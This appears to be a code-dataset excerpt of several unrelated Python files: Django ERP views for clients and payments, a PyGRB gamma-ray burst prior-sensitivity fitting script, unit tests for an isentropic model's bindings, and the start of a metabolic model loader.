    """Delete a Cliente and return to the client list."""
    model = models.Cliente
    success_url = reverse_lazy('serp:cliente-list')
# ----- COBRO -----
class CobroListView(ListView):
    """List Cobro records, optionally filtered by ?tipo=..., with totals."""
    model = models.Cobro
    tipo = ""

    def get_queryset(self):
        """Filter the queryset by the 'tipo' GET parameter, if present."""
        # Fixed: explicit class in super() -- super(self.__class__, self)
        # recurses infinitely as soon as this view is subclassed.
        datos = super(CobroListView, self).get_queryset()
        self.tipo = self.request.GET.get('tipo')
        if self.tipo:
            datos_filtro = datos.filter(tipo=self.tipo)
        else:
            datos_filtro = datos
        return datos_filtro

    def get_context_data(self, **kwargs):
        """Add income/expense totals for the listed cobros to the context."""
        contexto = super(CobroListView, self).get_context_data(**kwargs)
        cobros = self.object_list
        total = 0
        # Tipo 'I' counts as income, everything else as expense.
        for cobro in cobros:
            if cobro.tipo == 'I':
                total += cobro.importe
            else:
                total -= cobro.importe
        # NOTE(review): these three are hard-coded to zero -- placeholders
        # for a tax breakdown that was never implemented? Verify.
        contexto['total_base_imp'] = 0
        contexto['diferencia_base_imp'] = 0 * 21 / 100
        contexto['total_iva'] = 0
        contexto['total'] = total
        contexto['tipo'] = self.tipo
        return contexto
class CobroCreateView(CreateView):
    """Create a Cobro using the shared COBRO_FIELDS form."""
    model = models.Cobro
    fields = COBRO_FIELDS
class CobroUpdateView(UpdateView):
    """Edit a Cobro using the shared COBRO_FIELDS form."""
    model = models.Cobro
    fields = COBRO_FIELDS
class CobroDeleteView(DeleteView):
    """Delete a Cobro and return to the payments list."""
    model = models.Cobro
    success_url = reverse_lazy('serp:cobro-list')
class SepaXmlView(FormView):
    """Produce SEPA direct-debit XML content for one Domiciliacion."""
    form_class = forms.SepaTest
    template_name = 'serp/sepa_xml.html'

    def form_valid(self, form):
        # The target mandate's pk arrives as the 'domiciliacion' GET parameter.
        id_domiciliacion = int(self.request.GET.get('domiciliacion'))
        domiciliacion = models.Domiciliacion.objects.get(pk=id_domiciliacion)
        # NOTE(review): reads form.descripcion / form.importe as plain
        # attributes rather than form.cleaned_data -- assumes SepaTest sets
        # them during validation; verify against the form implementation.
        return sepa.generate_content(domiciliacion, form.descripcion,
                                     form.importe)
# ----- EMPRESA -----
class EmpresaUpdateView(UpdateView):
    """Edit the singleton Empresa record (only pk=1 is allowed)."""
    model = models.Empresa
    fields = EMPRESA_FIELDS

    def get(self, request, **kwargs):
        """Reject access to any pk other than the singleton's pk=1."""
        pk = int(kwargs['pk'])
        if pk != 1:
            return HttpResponseForbidden('Acceso prohibido')
        # Fixed two bugs: super(self.__class__, ...) recurses under
        # subclassing, and the bound super().get() was being passed an
        # extra `self`, which shifted `request` into *args.
        return super(EmpresaUpdateView, self).get(request, **kwargs)

    def get_queryset(self):
        # Lazily create the singleton Empresa row on first access.
        if models.Empresa.objects.count() == 0:
            empresa = models.Empresa()
            empresa.save()
        return models.Empresa.objects.all()
# ----- DOMICILIACION -----
class DomiciliacionListView(ListView):
    """List all Domiciliacion (direct-debit mandate) records."""
    model = models.Domiciliacion
class DomiciliacionCreateView(CreateView):
    """Create a Domiciliacion using the shared DOMICILIACION_FIELDS form."""
    model = models.Domiciliacion
    fields = DOMICILIACION_FIELDS
class DomiciliacionUpdateView(UpdateView):
    """Edit a Domiciliacion using the shared DOMICILIACION_FIELDS form."""
    model = models.Domiciliacion
    fields = DOMICILIACION_FIELDS
class DomiciliacionDeleteView(DeleteView):
    """Delete a Domiciliacion and return to the mandate list."""
    model = models.Domiciliacion
    success_url = reverse_lazy('serp:domiciliacion-list')
# ----- SERVICIO -----
class ServicioListView(ListView):
    """List Servicio records, optionally scoped to a single Cliente."""
    model = models.Servicio
    model_name = 'servicio'

    def get_queryset(self):
        """Return servicios for the URL's cliente if given, else all."""
        pk_cliente = self.kwargs.get('pk_cliente')
        if pk_cliente:
            cliente = get_object_or_404(models.Cliente, pk=pk_cliente)
            datos = self.model.objects.filter(cliente=cliente)
        else:
            # Fixed: explicit class in super() -- super(self.__class__, self)
            # recurses infinitely when this view is subclassed.
            datos = super(ServicioListView, self).get_queryset()
        return datos

    def get_context_data(self, **kwargs):
        """Expose model_name (and the cliente pk when scoped) to templates."""
        pk_cliente = self.kwargs.get('pk_cliente')
        if pk_cliente:
            self.model_name = 'cliente-servicio'
            self.pk_cliente = pk_cliente
        kwargs['model_name'] = self.model_name
        return super(ServicioListView, self).get_context_data(**kwargs)
class ServicioCreateView(CreateView):
    """Create a Servicio, optionally pre-bound to a Cliente from the URL.

    ``pk_refs_fields`` maps URL kwargs to form fields: when ``pk_cliente`` is
    present in the URL, the ``cliente`` field is pre-filled and disabled, and
    its value is injected back into the POST data on submission.
    """
    model = models.Servicio
    fields = SERVICIO_FIELDS
    pk_refs_fields = [('pk_cliente', 'cliente')]

    def get_context_data(self, **kwargs):
        # NOTE(review): 'pk_refs' is never placed in kwargs anywhere visible,
        # so this guard is always true -- possibly leftover; confirm intent.
        if 'pk_refs' not in kwargs:
            for pk_ref, _ in self.pk_refs_fields:
                if pk_ref in self.kwargs:
                    kwargs[pk_ref] = self.kwargs[pk_ref]
        # Bug fix: ``super(self.__class__, self)`` recurses infinitely in
        # subclasses; name the class explicitly (also below).
        return super(ServicioCreateView, self).get_context_data(**kwargs)

    def get_form(self, form_class=None):
        form = super(ServicioCreateView, self).get_form(form_class=form_class)
        for pk_ref, field_ref in self.pk_refs_fields:
            if pk_ref in self.kwargs:
                if field_ref in form.fields:
                    # Pre-select the referenced object and lock the widget.
                    form.initial[field_ref] = self.kwargs[pk_ref]
                    form.fields[field_ref].widget.attrs['disabled'] = True
        return form

    def post(self, request, *args, **kwargs):
        # Disabled widgets are not submitted by browsers, so re-inject the
        # URL-supplied value into a mutable copy of the POST data.
        data = request.POST.copy()
        for pk_ref, field_ref in self.pk_refs_fields:
            if (pk_ref in kwargs) and (field_ref not in data):
                data[field_ref] = str(kwargs[pk_ref])
        request.POST = data
        return super(ServicioCreateView, self).post(request, *args, **kwargs)
# ----- REMESA -----
class RemesaListView(ListView):
    """List all Remesa (remittance batch) records."""
    model = models.Remesa


class RemesaCreateView(CreateView):
    """Create a Remesa using the shared REMESA_FIELDS form."""
    model = models.Remesa
    fields = REMESA_FIELDS
| StarcoderdataPython |
212839 | import sys, os
import time
import argparse
import numpy as np
from bilby.core.prior import Uniform as bilbyUniform
from bilby.core.prior import DeltaFunction as bilbyDeltaFunction
from bilby.core.prior import Gaussian as bilbyGaussian
from PyGRB.main.fitpulse import PulseFitter
from PyGRB.backend.makemodels import create_model_from_key
from PyGRB.backend.makemodels import make_two_pulse_models
def run_log_flat_priors( indices,
                         model_keys,
                         channels,
                         nSamples,
                         n_per_split,
                         test
                         ):
    """Fit GRB 3770 with log-flat priors on the gamma / nu pulse parameters.

    Three prior "box" widths are tried (one decade, two decades, three
    decades around 1).  ``indices`` are global SLURM array-job indices; each
    prior set owns a contiguous slice of ``n_per_split`` indices, which are
    mapped back to (model, channel) slots before dispatch.  With
    ``test=True`` nothing is fitted -- the dispatch is only printed.
    """
    directory_labels = [ 'small_box_log_flat_nr',
                         'mid_box_log_flat_nr',
                         'large_box_log_flat_nr']
    # One bound-dict per box width; bounds widen by a decade per set.
    prior_sets = [{ 'priors_gamma_min': 1e-1, ## generic
                    'priors_gamma_max': 1e1,
                    'priors_nu_min'   : 1e-1,
                    'priors_nu_max'   : 1e1},
                  { 'priors_gamma_min': 1e-2,
                    'priors_gamma_max': 1e2,
                    'priors_nu_min'   : 1e-2,
                    'priors_nu_max'   : 1e2},
                  { 'priors_gamma_min': 1e-3,
                    'priors_gamma_max': 1e3,
                    'priors_nu_min'   : 1e-3,
                    'priors_nu_max'   : 1e3 }]
    for ii, prior_set in enumerate(prior_sets):
        if not test:
            # A fresh fitter per prior set so each run writes to its own
            # directory_label and carries its own gamma/nu bounds.
            GRB_wrap = PulseFitter(3770, times = (-.1, 1),
                datatype = 'tte', nSamples = nSamples, sampler = SAMPLER,
                priors_pulse_start = -.1, priors_pulse_end = 0.6,
                priors_td_lo = 0, priors_td_hi = 0.5,
                directory_label = directory_labels[ii],
                **prior_set)
            # Per-channel count offsets (presumably for plotting) -- TODO confirm.
            GRB_wrap.offsets = [0, 4000, 8000, -3000]
        else:
            print('Currently running log-flat priors')
        model_dict = {}
        for key in model_keys:
            # Suffix the model name so results of different prior sets
            # do not collide on disk.
            model_dict[key] = create_model_from_key(key,
                custom_name = f'{key}_{directory_labels[ii]}')
        models = [model for key, model in model_dict.items()]
        # Keep only the global indices belonging to this prior set, then
        # rebase them to 0..n_per_split-1 for the channel splitter.
        indx = np.intersect1d(indices,
            np.arange(n_per_split * ii, n_per_split * (ii + 1))) % n_per_split
        ## given 2 models and 4 channels should be passed indx in [0-7]
        if not test:
            GRB_wrap._split_array_job_to_4_channels(models = models,
                                                    indices = indx,
                                                    channels = channels)
        else:
            print(indx)
def run_flat_priors( indices,
                     model_keys,
                     channels,
                     nSamples,
                     n_per_split,
                     test
                     ):
    """Fit GRB 3770 with flat (uniform) priors on gamma / nu.

    Mirrors :func:`run_log_flat_priors` but overrides each per-pulse
    gamma/nu prior with a bilby ``Uniform`` distribution instead of relying
    on the fitter's built-in bounds.  The index bookkeeping assumes
    2 models x 4 channels per prior set (hard-coded strides of 8 and 4)
    and must stay in sync with the SLURM array scripts.
    """
    directory_labels = [ 'small_box_flat_nr',
                         'mid_box_flat_nr',
                         'large_box_flat_nr']
    # One bound-dict per box width; bounds widen by a decade per set.
    prior_sets = [{ 'priors_gamma_min': 1e-1, ## generic
                    'priors_gamma_max': 1e1,
                    'priors_nu_min'   : 1e-1,
                    'priors_nu_max'   : 1e1},
                  { 'priors_gamma_min': 1e-2,
                    'priors_gamma_max': 1e2,
                    'priors_nu_min'   : 1e-2,
                    'priors_nu_max'   : 1e2},
                  { 'priors_gamma_min': 1e-3,
                    'priors_gamma_max': 1e3,
                    'priors_nu_min'   : 1e-3,
                    'priors_nu_max'   : 1e3 }]
    for ii, prior_set in enumerate(prior_sets):
        if not test:
            GRB_wrap = PulseFitter(3770, times = (-.1, 1),
                datatype = 'tte', nSamples = nSamples, sampler = SAMPLER,
                priors_pulse_start = -.1, priors_pulse_end = 0.6,
                priors_td_lo = 0, priors_td_hi = 0.5,
                directory_label = directory_labels[ii])
            # Per-channel count offsets (presumably for plotting) -- TODO confirm.
            GRB_wrap.offsets = [0, 4000, 8000, -3000]
        else:
            print('Currently running flat priors')
        model_dict = {}
        for key in model_keys:
            model_dict[key] = create_model_from_key(key,
                custom_name = f'{key}_{directory_labels[ii]}')
        models = [model for key, model in model_dict.items()]
        for mm, model in enumerate(models):
            if not test:
                GRB_wrap._setup_labels(model)
                # Build explicit Uniform priors for every pulse n and every
                # channel suffix a-d, overriding the fitter defaults.
                overwrite_priors = dict()
                for n in range(1, GRB_wrap.num_pulses + 1):
                    for k in ['a', 'b', 'c', 'd']:
                        overwrite_priors[f'gamma_{n}_{k}'] = bilbyUniform(
                            minimum=prior_set['priors_gamma_min'],
                            maximum=prior_set['priors_gamma_max'],
                            latex_label=f'$\\gamma_{n} {k}$', unit=' ')
                        overwrite_priors[f'nu_{n}_{k}'] = bilbyUniform(
                            minimum=prior_set['priors_nu_min'],
                            maximum=prior_set['priors_nu_max'],
                            latex_label=f'$\\nu_{n} {k}$', unit=' ')
                GRB_wrap.overwrite_priors = overwrite_priors
            # Global index window for (prior set ii, model mm): 8 slots per
            # prior set, 4 channels per model.
            loop_idx = np.arange(8 * ii + 4 * mm, 8 * ii + 4 * (mm + 1))
            if test:
                print(indices)
                print(ii, mm)
                print('loop_idx = ', loop_idx)
            # Rebase the matching global indices to channel numbers 0-3.
            indx = np.intersect1d(indices, loop_idx) % 4
            if not test:
                GRB_wrap._split_array_job_to_4_channels(models = [model],
                    indices = indx, channels = channels)
            else:
                print('index passed = ', indx)
def run_delta_priors( indices,
                      model_keys,
                      channels,
                      nSamples,
                      n_per_split,
                      test
                      ):
    """Fit GRB 3770 with delta-function priors pinning gamma = nu = 1.

    A single prior set; every per-pulse gamma/nu parameter is fixed to 1 via
    a bilby ``DeltaFunction``.  Index bookkeeping assumes 4 channels per
    model (stride 4) and must stay in sync with the SLURM array scripts.
    """
    directory_label = 'delta_nr'
    if not test:
        GRB_wrap = PulseFitter(3770, times = (-.1, 1),
            datatype = 'tte', nSamples = nSamples, sampler = SAMPLER,
            priors_pulse_start = -.1, priors_pulse_end = 0.6,
            priors_td_lo = 0, priors_td_hi = 0.5,
            directory_label = directory_label)
        # Per-channel count offsets (presumably for plotting) -- TODO confirm.
        GRB_wrap.offsets = [0, 4000, 8000, -3000]
    else:
        print('Currently running delta function priors')
    model_dict = {}
    for key in model_keys:
        model_dict[key] = create_model_from_key(key,
            custom_name = f'{key}_{directory_label}')
    models = [model for key, model in model_dict.items()]
    for mm, model in enumerate(models):
        if not test:
            GRB_wrap._setup_labels(model)
            # Pin every gamma/nu parameter to exactly 1.
            overwrite_priors = dict()
            for n in range(1, GRB_wrap.num_pulses + 1):
                for k in ['a', 'b', 'c', 'd']:
                    overwrite_priors[f'gamma_{n}_{k}'] = bilbyDeltaFunction(
                        1, latex_label = f'$\\gamma$ {n} {k}')
                    overwrite_priors[f'nu_{n}_{k}'] = bilbyDeltaFunction(
                        1, latex_label = f'$\\nu$ {n} {k}')
            GRB_wrap.overwrite_priors = overwrite_priors
        # Global index window for model mm: 4 channels per model.
        loop_idx = np.arange(4 * mm, 4 * (mm + 1))
        if test:
            print(indices)
            print(mm)
            print('loop_idx = ', loop_idx)
        # Rebase matching global indices to channel numbers 0-3.
        indx = np.intersect1d(indices, loop_idx) % 4
        if not test:
            GRB_wrap._split_array_job_to_4_channels(models = [model],
                indices = indx, channels = channels)
        else:
            print('index passed = ', indx)
def run_gaussian_priors( indices,
                         model_keys,
                         channels,
                         nSamples,
                         n_per_split,
                         test
                         ):
    """Fit GRB 3770 with per-channel Gaussian priors on gamma / nu.

    A single prior set; each channel (suffix a-d) gets its own Gaussian
    mean / width, presumably informed by earlier fits -- TODO confirm the
    provenance of these numbers.  Index bookkeeping assumes 4 channels per
    model (stride 4) and must stay in sync with the SLURM array scripts.
    """
    directory_label = 'gaussian_nr'
    if not test:
        GRB_wrap = PulseFitter(3770, times = (-.1, 1),
            datatype = 'tte', nSamples = nSamples, sampler = SAMPLER,
            priors_pulse_start = -.1, priors_pulse_end = 0.6,
            priors_td_lo = 0, priors_td_hi = 0.5,
            directory_label = directory_label)
        # Per-channel count offsets (presumably for plotting) -- TODO confirm.
        GRB_wrap.offsets = [0, 4000, 8000, -3000]
    else:
        print('Currently running Gaussian priors')
    model_dict = {}
    for key in model_keys:
        model_dict[key] = create_model_from_key(key,
            custom_name = f'{key}_{directory_label}')
    models = [model for key, model in model_dict.items()]
    for mm, model in enumerate(models):
        if not test:
            GRB_wrap._setup_labels(model)
            # Channel-specific Gaussian hyper-parameters for each pulse n.
            overwrite_priors = dict()
            for n in range(1, GRB_wrap.num_pulses + 1):
                overwrite_priors[f'gamma_{n}_a'] = bilbyGaussian(
                    mu = 0.7, sigma = 2.5, latex_label = f'$\\gamma$ {n} a')
                overwrite_priors[f'gamma_{n}_b'] = bilbyGaussian(
                    mu = 0.3, sigma = 0.4, latex_label = f'$\\gamma$ {n} b')
                overwrite_priors[f'gamma_{n}_c'] = bilbyGaussian(
                    mu = 0.38, sigma = 0.3, latex_label = f'$\\gamma$ {n} c')
                overwrite_priors[f'gamma_{n}_d'] = bilbyGaussian(
                    mu = 0.5, sigma = 5, latex_label = f'$\\gamma$ {n} d')
                overwrite_priors[f'nu_{n}_a'] = bilbyGaussian(
                    mu = 2, sigma = 2, latex_label = f'$\\nu$ {n} a')
                overwrite_priors[f'nu_{n}_b'] = bilbyGaussian(
                    mu = 3.3, sigma = 1.2, latex_label = f'$\\nu$ {n} b')
                overwrite_priors[f'nu_{n}_c'] = bilbyGaussian(
                    mu = 2.74, sigma = 0.8, latex_label = f'$\\nu$ {n} c')
                overwrite_priors[f'nu_{n}_d'] = bilbyGaussian(
                    mu = 2.7, sigma = 5, latex_label = f'$\\nu$ {n} d')
            GRB_wrap.overwrite_priors = overwrite_priors
        # Global index window for model mm: 4 channels per model.
        loop_idx = np.arange(4 * mm, 4 * (mm + 1))
        if test:
            print(indices)
            print(mm)
            print('loop_idx = ', loop_idx)
        # Rebase matching global indices to channel numbers 0-3.
        indx = np.intersect1d(indices, loop_idx) % 4
        if not test:
            GRB_wrap._split_array_job_to_4_channels(models = [model],
                indices = indx, channels = channels)
        else:
            print('index passed = ', indx)
def analysis_for_3770(indices, test=False):
    """Dispatch GRB 3770 prior-sensitivity fits by global SLURM array index.

    The global index space is partitioned as: [0, 3n) log-flat priors,
    [3n, 6n) flat priors, [6n, 7n) delta priors, [7n, 8n) Gaussian priors,
    where n = n_per_split = len(model_keys) * len(channels).

    Parameters
    ----------
    indices : sequence of int
        Global array-job indices selecting (prior set, model, channel) fits.
    test : bool, optional
        When True, only print the dispatch instead of fitting.  Bug fix:
        a default of False is now provided so the ``__main__`` entry point,
        which calls ``analysis_for_3770(args.indices)``, no longer raises
        TypeError for the missing argument.
    """
    if not test:
        # Stagger cluster jobs so simultaneous starts do not collide.
        iddy = indices[0]
        time.sleep(iddy * 100)
    nSamples = 2000
    # NOTE(review): '<KEY>' looks like an anonymised placeholder for the
    # real model-key string -- confirm against the original repository.
    model_keys = ['<KEY>']
    channels = [0, 1, 2, 3]
    n_per_split = len(model_keys) * len(channels)
    current_idx = 0
    end_idx = current_idx + n_per_split * 3  # 3 prior sets for this function
    log_flat_indices = np.intersect1d(indices, np.arange(current_idx, end_idx))
    if len(log_flat_indices) > 0:
        print('Original indices passed to log-flat prior function: ', log_flat_indices)
        # No rebasing needed here: this block starts at global index 0.
        run_log_flat_priors(log_flat_indices, model_keys, channels,
                            nSamples, n_per_split, test)
    current_idx = end_idx
    end_idx = current_idx + n_per_split * 3  # 3 prior sets for this function
    flat_indices = np.intersect1d(indices, np.arange(current_idx, end_idx))
    if len(flat_indices) > 0:
        print('Original indices passed to flat prior function: ', flat_indices)
        flat_indices -= current_idx  # rebase to this block's 0-based range
        run_flat_priors(flat_indices, model_keys, channels,
                        nSamples, n_per_split, test)
    current_idx = end_idx
    end_idx = current_idx + n_per_split * 1  # 1 prior set for this function
    delta_indices = np.intersect1d(indices, np.arange(current_idx, end_idx))
    if len(delta_indices) > 0:
        print('Original indices passed to delta prior function: ', delta_indices)
        delta_indices -= current_idx  # rebase to this block's 0-based range
        run_delta_priors(delta_indices, model_keys, channels,
                         nSamples, n_per_split, test)
    current_idx = end_idx
    end_idx = current_idx + n_per_split * 1  # 1 prior set for this function
    gauss_indices = np.intersect1d(indices, np.arange(current_idx, end_idx))
    if len(gauss_indices) > 0:
        print('Original indices passed to Gaussian prior function: ', gauss_indices)
        gauss_indices -= current_idx  # rebase to this block's 0-based range
        run_gaussian_priors(gauss_indices, model_keys, channels,
                            nSamples, n_per_split, test)
def evidence_for_3770():
    """Collect residuals, lensing statistics and model evidences for GRB 3770.

    Rebuilds every (model key, prior-set label) combination used by the
    cluster runs, then post-processes each one with a single PulseFitter.
    """
    n_live = 2000
    keys = ['XsL', 'XsXs']
    channels = [0, 1, 2, 3]
    labels = [ 'small_box_log_flat_nr',
               'mid_box_log_flat_nr',
               'large_box_log_flat_nr',
               'small_box_flat_nr',
               'mid_box_flat_nr',
               'large_box_flat_nr',
               'delta_nr',
               'gaussian_nr']
    # One model per (key, prior label) pair, named to match the run outputs.
    models_by_name = {
        f'{key}_{label}': create_model_from_key(key,
                                                custom_name=f'{key}_{label}')
        for key in keys
        for label in labels
    }
    fitter = PulseFitter(3770, times=(-.1, 1),
                         datatype='tte', nSamples=n_live, sampler=SAMPLER,
                         priors_pulse_start=-.1, priors_pulse_end=0.6,
                         priors_td_lo=0, priors_td_hi=0.5)
    fitter.offsets = [0, 4000, 8000, -3000]
    for model in models_by_name.values():
        fitter.get_residuals(channels=channels, model=model)
        fitter.lens_calc(channels=channels, model=model)
    fitter.get_evidence_from_models(models_by_name)
if __name__ == '__main__':
    # Entry point: local runs do the evidence post-processing, HPC runs do
    # the nested-sampling array jobs.
    parser = argparse.ArgumentParser( description = 'Core bilby wrapper')
    parser.add_argument('--HPC', action = 'store_true',
        help = 'Are you running this on SPARTAN ?')
    parser.add_argument('-i', '--indices', type=int, nargs='+',
        help='an integer for indexing geomspace array')
    args = parser.parse_args()
    HPC = args.HPC
    if not HPC:
        # Local machine: configure LaTeX plotting and post-process results.
        from matplotlib import rc
        rc('font', **{'family': 'DejaVu Sans',
            'serif': ['Computer Modern'],'size': 8})
        rc('text', usetex=True)
        rc('text.latex',
            preamble=r'\usepackage{amsmath}\usepackage{amssymb}\usepackage{amsfonts}')
        SAMPLER = 'nestle'
        # run the later analysis on a local machine
        evidence_for_3770()
    else:
        # run the nested sampling on a cluster
        # the indices allow each model/channel to be run simultaneously on
        # different machines. See the slurm scripts for examples
        SAMPLER = 'dynesty'
        # NOTE(review): analysis_for_3770 is called with one argument here;
        # confirm its signature provides a default for the 'test' parameter,
        # otherwise this call raises TypeError.
        analysis_for_3770(args.indices)
| StarcoderdataPython |
11215512 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# _________ _______ __
# / _/ ___// ____/ | / /
# / / \__ \/ __/ / |/ /
# _/ / ___/ / /___/ /| /
# /___//____/_____/_/ |_/
#
# Isentropic model - ETH Zürich
# Copyright (C) 2016 <NAME> (<EMAIL>)
#
# This file is distributed under the MIT Open Source License. See LICENSE.TXT for details.
#
from __future__ import print_function, division
import unittest
import os
import tempfile
import numpy as np
import IsenPython
# Directory containing this test module, used to locate bundled test data.
ScriptPath = os.path.dirname(os.path.realpath(__file__))

# Candidate namelist files shipped with the test data.
files = [os.path.join(ScriptPath, "..", "data", "namelist.m"),
         os.path.join(ScriptPath, "..", "test", "data", "namelist.m")]
# Bug fix: materialise the result as a list.  Under Python 3, filter()
# returns a lazy iterator, which broke the later len(files) and files[0]
# uses; the '== True' comparison was also redundant.
files = [f for f in files if os.path.exists(f)]
## Solver
class TestSolver(unittest.TestCase):
    """Tests for the PySolver bindings: construction, init, field access, output."""

    def setUp(self):
        # A fresh solver per test so state cannot leak between cases.
        self.solver = IsenPython.Solver()

    def test_constructor(self):
        """A known archetype constructs and initialises; unknown names raise."""
        namelist = IsenPython.NameList()
        try:
            solver = IsenPython.Solver("ref")
            solver.init(namelist)
        except RuntimeError as e:
            # Bug fix: Python 3 exceptions have no '.message' attribute;
            # format the exception object itself (equivalent to str(e)).
            self.fail("IsenException caught: {0}".format(e))
        with self.assertRaises(RuntimeError):
            solver = IsenPython.Solver("qwfawsdqwadqwf")
            solver.init(namelist)

    def test_init_namelist(self):
        """Initialisation with a NameList object succeeds."""
        namelist = IsenPython.NameList()
        try:
            self.solver.init(namelist)
        except RuntimeError as e:
            self.fail("IsenException caught: {0}".format(e))

    @unittest.skipIf(len(files) == 0, "no namelist file available")
    def test_init_file(self):
        """Initialisation from a namelist file on disk succeeds."""
        try:
            self.solver.init(files[0])
        except RuntimeError as e:
            self.fail("IsenException caught: \"{0}\"".format(e))

    def test_get_field(self):
        """getField returns an array of the expected shape; bad names raise."""
        namelist = IsenPython.NameList()
        try:
            self.solver.init(namelist)
            u = self.solver.getField("unow")
            # u is staggered in x and padded by nb boundary points per side.
            self.assertTrue(np.shape(u) == (namelist.nx + 1 + 2*namelist.nb, namelist.nz))
        except RuntimeError as e:
            self.fail("IsenException caught: \"{0}\"".format(e))
        with self.assertRaises(RuntimeError):
            self.solver.getField("not-a-field")

    def test_get_namelist(self):
        """The solver reflects the NameList it was initialised with."""
        namelist = IsenPython.NameList()
        namelist.nz = 100
        self.solver.init(namelist)
        self.assertTrue(self.solver.getNameList().nz == namelist.nz)

    def test_get_output(self):
        """The solver's Output object carries the same namelist parameters."""
        namelist = IsenPython.NameList()
        self.solver.init(namelist)
        self.assertTrue(self.solver.getOutput().getNameList().nz == namelist.nz)

    def test_write(self):
        """Writing a text archive succeeds and the file is cleaned up."""
        namelist = IsenPython.NameList()
        namelist.nx = 5
        namelist.nz = 5
        self.solver.init(namelist)
        tfile = "__temporary_output_file__.txt"
        try:
            self.solver.write(IsenPython.ArchiveType.Text, tfile)
        except RuntimeError as e:
            self.fail("IsenException caught: \"{0}\"".format(e))
        finally:
            # Guard the cleanup: if write() failed before creating the file,
            # an unguarded os.remove would mask the real test failure.
            if os.path.exists(tfile):
                os.remove(tfile)
## Output
class TestOutput(unittest.TestCase):
    """Tests for the PyOutput bindings: construction, field access, (de)serialisation."""

    def setUp(self):
        # Small grid so each test runs quickly.
        self.namelist = IsenPython.NameList()
        self.namelist.nx = 5
        self.namelist.nz = 5
        # NOTE(review): these three flags are set but never read by the
        # tests below -- presumably kept for future moist-physics cases.
        self.imoist = False
        self.imicrophys = 0
        self.idthdt = False
        self.solver = IsenPython.Solver()
        self.solver.init(self.namelist)

    def test_init_from_solver(self):
        """An Output obtained from a solver carries the solver's namelist."""
        try:
            output = self.solver.getOutput()
            self.assertTrue(output.getNameList().nx == self.namelist.nx)
        except RuntimeError as e:
            # Bug fix: Python 3 exceptions have no '.message' attribute;
            # format the exception object itself (equivalent to str(e)).
            self.fail("IsenException caught: \"{0}\"".format(e))

    def test_get_field(self):
        """Dry-run outputs expose z/u/s/t but no precipitation field."""
        try:
            output = self.solver.getOutput()
            z = output.z()
            u = output.u()
            s = output.s()
            t = output.t()
        except RuntimeError as e:
            self.fail("IsenException caught: \"{0}\"".format(e))
        with self.assertRaises(RuntimeError):
            output = self.solver.getOutput()
            output.prec()

    def test_read_write(self):
        """Round-trip every archive type (text, XML, binary) through disk."""
        for archive in [IsenPython.ArchiveType.Text,
                        IsenPython.ArchiveType.Xml,
                        IsenPython.ArchiveType.Binary]:
            tfile = "__temporary_output_file__"
            try:
                if archive == IsenPython.ArchiveType.Text:
                    tfile += ".txt"
                elif archive == IsenPython.ArchiveType.Xml:
                    tfile += ".xml"
                else:
                    tfile += ".bin"
                self.solver.write(archive, tfile)
                output = IsenPython.Output()
                output.read(tfile)
            except RuntimeError as e:
                self.fail("IsenException caught: \"{0}\"".format(e))
            finally:
                # Guard the cleanup: an unguarded os.remove on a file the
                # failed write never created would mask the real failure.
                if os.path.exists(tfile):
                    os.remove(tfile)
## NameList
class TestNameList(unittest.TestCase):
    """Tests for the PyNameList bindings: construction, printing, attributes."""

    def test_init_default(self):
        """Default construction succeeds."""
        namelist = IsenPython.NameList()
        self.assertIsNotNone(namelist)

    @unittest.skipIf(len(files) == 0, "no namelist file available")
    def test_init_file(self):
        """Construction from a namelist file succeeds; bad paths raise."""
        try:
            namelist = IsenPython.NameList(files[0])
        except RuntimeError as e:
            # Bug fix: Python 3 exceptions have no '.message' attribute;
            # format the exception object itself (equivalent to str(e)).
            self.fail("IsenException caught: {0}".format(e))
        with self.assertRaises(RuntimeError):
            namelist = IsenPython.NameList("not-a-file")

    def test_print(self):
        """The namelist has a usable string representation."""
        namelist = IsenPython.NameList()
        self.assertIsNotNone(namelist.__str__())

    def test_property(self):
        """Every expected namelist parameter is exposed as an attribute."""
        namelist = IsenPython.NameList()
        # Replaces 35 near-identical assertTrue(hasattr(...)) lines; the
        # attribute name is passed as the assertion message so a failure
        # reports which parameter is missing.
        expected_attributes = (
            'run_name', 'iout', 'iiniout', 'xl', 'nx', 'thl', 'nz', 'time',
            'dt', 'diff', 'topomx', 'topowd', 'topotim', 'u00', 'bv00',
            'th00', 'ishear', 'k_shl', 'k_sht', 'u00_sh', 'nab', 'diffabs',
            'irelax', 'nb', 'iprtcfl', 'itime', 'imoist', 'imoist_diff',
            'imicrophys', 'idthdt', 'iern', 'vt_mult', 'autoconv_th',
            'autoconv_mult', 'sediment_on',
        )
        for name in expected_attributes:
            self.assertTrue(hasattr(namelist, name), name)
if __name__ == "__main__":
    # Silence the C++ logger so unittest output stays readable, then run
    # every test case in this module.
    IsenPython.Logger().disable()
    unittest.main()
| StarcoderdataPython |
9658897 | <gh_stars>0
from __future__ import print_function, division, absolute_import
import os
import libsbml
from .MetabolicModel import MetabolicModel
from ..globals import MODEL_DIR
from . import importMATLAB
from . import importSBML2
from . import importSBML3
from .geneSymbols import resolve_genes, convert_species
from .importCommon import clean_reactions, limit_maximum_flux
# ----------------------------------------
# Loading models from either XML or MATLAB outputs
# ----------------------------------------
def load_metabolic_model(model_name, species='homo_sapiens'):
    """Load the metabolic model named *model_name* and return a Model object.

    Names ending in ``_mat`` are loaded through the MATLAB importer; anything
    else is resolved to an SBML (.xml / .xml.gz) file inside MODEL_DIR and
    dispatched to the level-2 or level-3 SBML importer.  The loaded model is
    then post-processed (gene resolution, species conversion, reaction
    cleanup, flux capping) before being returned.
    """
    if model_name.endswith('_mat'):
        model = importMATLAB.load(model_name, species)
    else:
        model_dir = os.path.join(MODEL_DIR, model_name)
        # Pick the first SBML file found in the model directory.
        candidates = [entry for entry in os.listdir(model_dir)
                      if entry.lower().endswith(('.xml', '.xml.gz'))]
        if not candidates:
            raise Exception(
                "Invalid model - could not find .xml or .xml.gz file in " +
                model_dir)
        sbml_file = candidates[0]
        sbmlDocument = libsbml.readSBMLFromFile(
            os.path.join(model_dir, sbml_file))
        level = sbmlDocument.getLevel()
        if level == 3:
            model = importSBML3.load(model_name, sbmlDocument)
        elif level == 2:
            model = importSBML2.load(model_name, sbmlDocument)
        else:
            raise Exception(
                "Invalid level {} for model {}".format(level, sbml_file))
    # Shared post-processing for every import path.
    resolve_genes(model)
    convert_species(model, species)
    clean_reactions(model)
    limit_maximum_flux(model, 1000)
    return model
def init_model(model, species, exchange_limit, media=None):
    """Load a metabolic model and prepare it for analysis.

    Caps exchange reactions at *exchange_limit*, splits reversible fluxes
